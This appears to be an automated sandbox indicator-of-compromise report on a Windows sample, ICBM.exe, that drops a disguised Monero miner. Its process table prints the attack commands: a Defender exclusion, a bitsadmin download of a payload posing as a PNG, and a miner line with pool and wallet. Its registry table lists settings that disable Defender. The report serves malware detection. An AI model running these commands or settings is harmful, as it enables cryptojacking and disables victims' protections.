IOC Report
ICBM.exe

loading gif

Files

File Path
Type
Category
Malicious
ICBM.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
malicious
C:\Windows\System32\WinRing0x64.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\msvchost.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\IT\service_log.txt
ASCII text, with very long lines (1157)
modified
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xf563772e, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Windows\BITA85D.tmp
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
dropped
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_52g4imp4.qvm.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_55ih5ksc.i53.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_qh4ad3nr.cg0.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_wlwjd3gc.pa1.psm1
ASCII text, with no line terminators
dropped
C:\Windows\img.png (copy)
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\ICBM.exe
"C:\Users\user\Desktop\ICBM.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Users\user\Desktop\ICBM.exe
C:\Users\user\Desktop\ICBM.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\bitsadmin.exe
"bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\msvchost.exe
C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT --tls --coin monero
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\sc.exe
"sc" start my_system_service
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2
unknown
malicious
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724
unknown
malicious
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
104.26.9.242
malicious
https://dl.imgdrop.io/
unknown
malicious
https://g.live.com/odclientsettings/Prod/C:
unknown
https://github.com/clap-rs/clap/issuesC:
unknown
https://github.com/clap-rs/clap/issuesjA
unknown
http://ns.adobe.assertion
unknown
http://ocsp.cloudflare.com/origin_ca0
unknown
http://crl.cloudflare.com/origin_ca.crl
unknown
https://docs.rs/getrandom#nodejs-es-module-support
unknown
https://xmrig.com/docs/algorithms
unknown
https://github.com/clap-rs/clap/issues-
unknown
http://crl.cloudflare.com/origin_ca.crl0
unknown
http://crl.ver)
unknown
http://ocsp.cloudflare.com/origin_ca
unknown
http://www.quovadis.bm0
unknown
https://xmrig.com/benchmark/%s
unknown
https://xmrig.com/wizard
unknown
https://ocsp.quovadisoffshore.com0
unknown
http://crl.cloudflare.com/origin_ca.crlH
unknown
https://github.com/clap-rs/clap/issues
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dl.imgdrop.io
104.26.9.242
malicious
xmr-eu2.nanopool.org
51.195.43.17
malicious

IPs

IP
Domain
Country
Malicious
104.26.9.242
dl.imgdrop.io
United States
malicious
51.15.89.13
unknown
France
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DisableAntiSpyware
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DisableAntiVirus
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine
MpEnablePus
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableIOAVProtection
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableOnAccessProtection
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableRealtimeMonitoring
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableScanOnRealtimeEnable
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting
DisableEnhancedNotifications
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
DisableBlockAtFirstSeen
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
SpynetReporting
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
SubmitSamplesConsent
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
FirewallOverride
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
FirewallDisableNotify
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
AntiSpywareOverride
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
AntiVirusOverride
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
AntiVirusDisableNotify
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
UpdatesOverride
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
UpdatesDisableNotify
malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger
Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger
Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdBoot
Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdFilter
Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc
Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDefend
Start
HKEY_USERS.DEFAULT\Software\Classes\Local Settings\MuiCache\e\52C64B7E
@%ProgramFiles%\Windows Defender\MpAsDesc.dll,-300
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 17 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1CCF878A000
heap
page read and write
malicious
7FF6F3AA0000
unkown
page readonly
malicious
25943FC3000
heap
page read and write
malicious
7FF6F3617000
unkown
page readonly
malicious
25943F8C000
heap
page read and write
malicious
259459F0000
heap
page read and write
8611DFF000
stack
page read and write
20AFE6EE000
heap
page read and write
25944067000
heap
page read and write
226046C2000
unkown
page read and write
22602580000
unkown
page read and write
20A88640000
trusted library allocation
page read and write
B67BEFC000
stack
page read and write
22604658000
unkown
page read and write
CEA347E000
stack
page read and write
20A80600000
trusted library allocation
page read and write
7FF6D2F33000
unkown
page readonly
20A887B0000
trusted library allocation
page read and write
20AFE62A000
heap
page read and write
25948400000
direct allocation
page read and write
22604360000
unkown
page read and write
20A80496000
heap
page read and write
B67BFFE000
stack
page read and write
2260478C000
unkown
page read and write
F395687000
unkown
page read and write
7FF6D2EED000
unkown
page readonly
1CCEC590000
heap
page read and write
CEA34FF000
stack
page read and write
1B2C5710000
heap
page read and write
20A88A10000
trusted library allocation
page read and write
20AFE8E0000
heap
page read and write
20AFE6B0000
heap
page read and write
25D5E9D0000
heap
page read and write
20AFE8D0000
unclassified section
page readonly
1CCEC4C3000
heap
page read and write
86143FE000
stack
page read and write
25945AF6000
direct allocation
page execute and read and write
25945B27000
direct allocation
page execute and read and write
25945AEC000
heap
page read and write
BE5627F000
stack
page read and write
86146FE000
stack
page read and write
20A88820000
remote allocation
page read and write
8612FFF000
stack
page read and write
226025F0000
unkown
page readonly
1B2C55D9000
heap
page read and write
7FF6F31F0000
unkown
page readonly
20AFF000000
heap
page read and write
1CCEEFC4000
heap
page read and write
25945ABC000
heap
page read and write
7FF6D2F8B000
unkown
page readonly
1CCED1C4000
heap
page read and write
2594D400000
direct allocation
page read and write
22604F60000
heap
page read and write
7FF6F31F1000
unkown
page execute read
7FF6D2F33000
unkown
page readonly
20AFE6C0000
heap
page read and write
7FF6D2F8A000
unkown
page write copy
CEA2AEB000
stack
page read and write
20A88679000
trusted library allocation
page read and write
22602609000
heap
page read and write
8614FFE000
stack
page read and write
1CCEC490000
heap
page read and write
1CCEC4BE000
heap
page read and write
14CD7FE000
stack
page read and write
23358A80000
heap
page read and write
8614BFE000
stack
page read and write
25D5EBDC000
heap
page read and write
20A80502000
heap
page read and write
7FF6D2F8A000
unkown
page read and write
8611FFD000
stack
page read and write
86144FE000
stack
page read and write
25945ADC000
heap
page read and write
2260477D000
unkown
page read and write
CEA337B000
stack
page read and write
20A80020000
trusted library section
page readonly
BE562FE000
stack
page read and write
25D5EBF7000
heap
page read and write
25945972000
direct allocation
page execute and read and write
25945962000
direct allocation
page execute and read and write
25947000000
direct allocation
page read and write
23358C10000
heap
page read and write
25945C00000
direct allocation
page read and write
20AFF100000
heap
page read and write
2260444E000
unkown
page read and write
1CCEC600000
heap
page read and write
22604724000
unkown
page read and write
20A80030000
trusted library section
page readonly
1CCF2D2F000
heap
page read and write
25D5EC04000
heap
page read and write
20A88670000
trusted library allocation
page read and write
8611AFF000
stack
page read and write
86142FF000
stack
page read and write
20AFFF20000
trusted library allocation
page read and write
CEA2F79000
stack
page read and write
14CD6FF000
stack
page read and write
BE5637F000
stack
page read and write
20A80553000
heap
page read and write
7FF6F3A6F000
unkown
page readonly
22602840000
heap
page read and write
259459E5000
heap
page read and write
7FF6D2F8B000
unkown
page readonly
20AFE6D5000
heap
page read and write
25945AAC000
heap
page read and write
86140FE000
stack
page read and write
20AFE6CC000
heap
page read and write
25945840000
heap
page read and write
2594590F000
direct allocation
page execute and read and write
25945A70000
heap
page read and write
1CCEC4BE000
heap
page read and write
20A803A1000
trusted library allocation
page read and write
1CCEC4B6000
heap
page read and write
20A80461000
heap
page read and write
1CCEC52C000
heap
page read and write
7FF6D2D31000
unkown
page execute read
25948E00000
direct allocation
page read and write
1B2C5790000
heap
page read and write
1CCF192F000
heap
page read and write
20A887A0000
trusted library allocation
page read and write
25D5ECB0000
heap
page read and write
CEA38FE000
stack
page read and write
20A88820000
remote allocation
page read and write
7FF6D2EED000
unkown
page readonly
20AFE6FB000
heap
page read and write
7FF6D2D30000
unkown
page readonly
20A886A0000
trusted library allocation
page read and write
20A8866D000
trusted library allocation
page read and write
8611CFE000
stack
page read and write
B67C0FE000
stack
page read and write
20AFE702000
heap
page read and write
8611BFE000
stack
page read and write
86147FE000
stack
page read and write
1CCEC675000
heap
page read and write
7FF6D2EED000
unkown
page readonly
7FF6D2D30000
unkown
page readonly
20AFE600000
heap
page read and write
7FF6D2F33000
unkown
page readonly
25945A7A000
heap
page read and write
20A8866A000
trusted library allocation
page read and write
F39597E000
unkown
page read and write
14CD9FC000
stack
page read and write
22602600000
heap
page read and write
F3959FC000
unkown
page read and write
25945A30000
heap
page read and write
1CCEC7C4000
heap
page read and write
1CCEC340000
heap
page read and write
20AFE6E0000
heap
page read and write
25949800000
direct allocation
page read and write
22604C30000
unkown
page read and write
25945908000
direct allocation
page execute and read and write
20AFE6C5000
heap
page read and write
F39568D000
unkown
page read and write
86148FF000
stack
page read and write
86149FE000
stack
page read and write
20A8867F000
trusted library allocation
page read and write
1CCEC51D000
heap
page read and write
1B2C5715000
heap
page read and write
20AFE560000
unclassified section
page readonly
20A88650000
trusted library allocation
page read and write
1CCEC4DC000
heap
page read and write
1CCEC4C1000
heap
page read and write
14CD33D000
stack
page read and write
1CCEC498000
heap
page read and write
7FF6D2F33000
unkown
page readonly
20AFF102000
heap
page read and write
25D5EBFF000
heap
page read and write
20A80551000
heap
page read and write
20AFE6A1000
heap
page read and write
25946600000
direct allocation
page read and write
20A88820000
remote allocation
page read and write
7FF6F37BF000
unkown
page write copy
7FF6F3A9A000
unkown
page execute read
20A886A0000
trusted library allocation
page read and write
7FF6D2F8A000
unkown
page write copy
259459E0000
heap
page read and write
25945941000
direct allocation
page execute and read and write
1CCEC4C3000
heap
page read and write
25945930000
direct allocation
page execute and read and write
7FF6D2D31000
unkown
page execute read
259459D5000
direct allocation
page execute and read and write
20A8048C000
heap
page read and write
20AFF19B000
heap
page read and write
20A803E0000
trusted library allocation
page read and write
20AFFC60000
trusted library allocation
page read and write
20A80010000
trusted library section
page readonly
1CCF0F2F000
heap
page read and write
259459B4000
direct allocation
page execute and read and write
25943F80000
heap
page read and write
22604746000
unkown
page read and write
20AFE671000
heap
page read and write
25947A00000
direct allocation
page read and write
20AFE550000
heap
page read and write
25945B17000
direct allocation
page execute and read and write
86145FE000
stack
page read and write
CEA3DFE000
stack
page read and write
25945B06000
direct allocation
page execute and read and write
F3958FE000
unkown
page read and write
22602C01000
unkown
page readonly
20AFE6A7000
heap
page read and write
22604704000
unkown
page read and write
CEA35F9000
stack
page read and write
25945AA4000
heap
page read and write
CEA307E000
stack
page read and write
20A887D0000
trusted library allocation
page read and write
25945900000
direct allocation
page execute and read and write
22604586000
unkown
page read and write
1B2C55D0000
heap
page read and write
20AFE5C0000
heap
page read and write
259459ED000
heap
page read and write
7FF6D2D31000
unkown
page execute read
20A89000000
heap
page read and write
20AFF002000
heap
page read and write
20AFE67F000
heap
page read and write
25D5EBF2000
heap
page read and write
2594A200000
direct allocation
page read and write
20A88660000
trusted library allocation
page read and write
20A88676000
trusted library allocation
page read and write
25945AD4000
heap
page read and write
8614AFF000
stack
page read and write
226045D0000
unkown
page read and write
25943FE7000
heap
page read and write
BE5647E000
stack
page read and write
20A88790000
trusted library allocation
page read and write
25D5EDD0000
heap
page read and write
25D5EDD5000
heap
page read and write
22602845000
heap
page read and write
20A80400000
heap
page read and write
20A8867C000
trusted library allocation
page read and write
20A803D0000
trusted library allocation
page read and write
1CCEC4B3000
heap
page read and write
1B2C5480000
heap
page read and write
20A80514000
heap
page read and write
1CCEDBC4000
heap
page read and write
20A8047C000
heap
page read and write
1CCEC4C1000
heap
page read and write
20A88660000
trusted library allocation
page read and write
25945983000
direct allocation
page execute and read and write
20A80447000
heap
page read and write
25D5EC02000
heap
page read and write
259459C5000
direct allocation
page execute and read and write
2594405E000
heap
page read and write
226027D0000
unkown
page read and write
20A80050000
trusted library section
page readonly
20AFE713000
heap
page read and write
2594B600000
direct allocation
page read and write
2594406B000
heap
page read and write
20A88664000
trusted library allocation
page read and write
CEA387E000
stack
page read and write
23358A8C000
heap
page read and write
7FF6D2F8B000
unkown
page readonly
20A887B0000
trusted library allocation
page read and write
20A88690000
trusted library allocation
page read and write
20A88730000
trusted library allocation
page read and write
25945AB4000
heap
page read and write
2260463A000
unkown
page read and write
7FF6D2D30000
unkown
page readonly
BE55F49000
stack
page read and write
8614EFE000
stack
page read and write
259459A4000
direct allocation
page execute and read and write
CEA36FF000
stack
page read and write
20AFE613000
heap
page read and write
2594CA00000
direct allocation
page read and write
86137FE000
stack
page read and write
2594C000000
direct allocation
page read and write
23358B80000
heap
page read and write
20A80557000
heap
page read and write
BE55FCE000
stack
page read and write
20A88683000
trusted library allocation
page read and write
25945AC4000
heap
page read and write
14CDAFE000
stack
page read and write
25945920000
direct allocation
page execute and read and write
25945AE4000
heap
page read and write
25D5EBBC000
heap
page read and write
A4C5EFF000
stack
page read and write
B67C1FF000
stack
page read and write
CEA367E000
stack
page read and write
20A88690000
trusted library allocation
page read and write
1CCEE5C4000
heap
page read and write
20A89010000
heap
page read and write
2594405B000
heap
page read and write
20A8054A000
heap
page read and write
20A88680000
trusted library allocation
page read and write
7FF6D2F8B000
unkown
page readonly
20AFE65B000
heap
page read and write
20A887C0000
trusted library allocation
page read and write
7FF6D2D31000
unkown
page execute read
25945993000
direct allocation
page execute and read and write
25945A80000
heap
page read and write
86141FF000
stack
page read and write
22602850000
unkown
page readonly
2260474B000
unkown
page read and write
20AFE6B8000
heap
page read and write
86118FF000
stack
page read and write
20A80480000
heap
page read and write
20AFE641000
heap
page read and write
CEA33FF000
stack
page read and write
8613FFE000
stack
page read and write
20A88673000
trusted library allocation
page read and write
20A80499000
heap
page read and write
22604460000
unkown
page read and write
22602540000
heap
page read and write
8614DFE000
stack
page read and write
8611EFE000
stack
page read and write
20AFF200000
trusted library section
page read and write
25945951000
direct allocation
page execute and read and write
20A88686000
trusted library allocation
page read and write
20AFE684000
heap
page read and write
25945ACC000
heap
page read and write
CEA39FB000
stack
page read and write
20AFF119000
heap
page read and write
20A80567000
heap
page read and write
25943FD6000
heap
page read and write
CEA3AFA000
stack
page read and write
20A804D7000
heap
page read and write
86140FB000
stack
page read and write
A4C5E7E000
stack
page read and write
25D5EC09000
heap
page read and write
20A88730000
trusted library allocation
page read and write
7FF6D2EED000
unkown
page readonly
25D5EB30000
heap
page read and write
1CCF372F000
heap
page read and write
20AFE6AE000
heap
page read and write
22604660000
unkown
page read and write
CEA317C000
stack
page read and write
CEA327C000
stack
page read and write
23358950000
heap
page read and write
20AFE6F2000
heap
page read and write
20AFE6A4000
heap
page read and write
1CCF232F000
heap
page read and write
1CCEC670000
heap
page read and write
2594AC00000
direct allocation
page read and write
861158A000
stack
page read and write
25943F00000
heap
page read and write
A4C5B9D000
stack
page read and write
25D5EBB0000
heap
page read and write
20AFEED0000
trusted library allocation
page read and write
20A80000000
trusted library section
page readonly
20AFE6B3000
heap
page read and write
20A80454000
heap
page read and write
86127FB000
stack
page read and write
20AFF113000
heap
page read and write
1B2C5720000
heap
page read and write
20A88689000
trusted library allocation
page read and write
20A88661000
trusted library allocation
page read and write
20A88740000
trusted library allocation
page read and write
8614CFE000
stack
page read and write
226044C2000
unkown
page read and write
20AFE5F0000
unclassified section
page readonly
20AFE69B000
heap
page read and write
25945A9C000
heap
page read and write
BE563FD000
stack
page read and write
7FF6D2F8A000
unkown
page read and write
20A886A4000
trusted library allocation
page read and write
1CCEC4D4000
heap
page read and write
25943DC0000
heap
page read and write
20A80464000
heap
page read and write
7FF6D2D30000
unkown
page readonly
259458B0000
direct allocation
page execute read
20A80040000
trusted library section
page readonly
8611FFB000
stack
page read and write
20AFF015000
heap
page read and write
CEA37FE000
stack
page read and write
F39568F000
unkown
page read and write
22602A61000
unkown
page readonly
23358D80000
heap
page read and write
20AFF119000
heap
page read and write
22604524000
unkown
page read and write
20AFE673000
heap
page read and write
There are 357 hidden memdumps, click here to show them.